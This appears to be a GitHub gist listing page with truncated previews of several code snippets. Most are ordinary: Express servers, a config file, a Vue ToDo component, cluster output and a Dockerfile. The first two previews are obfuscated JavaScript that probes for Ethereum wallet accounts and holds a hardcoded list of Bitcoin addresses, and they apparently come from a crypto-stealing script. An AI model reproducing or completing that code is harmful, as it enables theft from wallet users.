This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var neth = 0, | |
| rund = 0, | |
| loval = 0 | |
| async function checkethereumw() { | |
| try { | |
| const _0x124ed3 = await window.ethereum.request({ method: 'eth_accounts' }) | |
| _0x124ed3.length > 0 | |
| ? (runmask(), rund != 1 && ((rund = 1), (neth = 1), newdlocal())) | |
| : rund != 1 && ((rund = 1), newdlocal()) | |
| } catch (_0x53a897) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function _0x20669a(_0x530d91) { | |
| var _0x264994 = [ | |
| '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', | |
| '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', | |
| '1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP', | |
| '1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY', | |
| '1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj', | |
| '1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N', | |
| '1KkovSeka94yC5K4fDbfbvZeTFoorPggKW', | |
| '18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| module.exports = { | |
| db: { | |
| connectionString: '' || process.env.DB_CONNECTION_STRING, | |
| }, | |
| someService: { | |
| someApiKey: '' || process.env.SOME_API_KEY, | |
| } | |
| }; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let loggerBuilder = require('./logger.js'); | |
| let config = require('./config.js'); | |
| let express = require('express'); | |
| let app = express(); | |
| let logger = new loggerBuilder(); | |
| app.use(express.json()); | |
| app.use(express.urlencoded({ | |
| extended: true |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let express = require('express'); | |
| let app = express(); | |
| app.use(express.static('dist')); | |
| app.listen(3000, () => { | |
| console.log('Server is up and running!'); | |
| }) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .box { | |
| border-radius: 8px; | |
| border: 1px solid #dadce0; | |
| padding: 35px; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div class="row"> | |
| <div class="mx-auto box"> | |
| <div class="col-12 text-center"> | |
| <h4>ToDo</h4> | |
| </div> | |
| <div class="col-12 text-center"> | |
| <h5 class="lead">Add a new todo item.</h5> | |
| </div> | |
| <br /> | |
| <div class="col-12"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| const axios = require("axios"); | |
| export default { | |
| name: "ToDo", | |
| data() { | |
| return { | |
| todos: [], | |
| todo: { | |
| Content: '', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NAME LOCATION MASTER_VERSION MASTER_IP MACHINE_TYPE NODE_VERSION NUM_NODES STATUS | |
| simple-http-kubes us-east1 1.10.9-gke.5 35.229.48.250 f1-micro 1.10.9-gke.5 6 RUNNING |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM node:lts | |
| ADD index.js /index.js | |
| CMD node index.js |
NewerOlder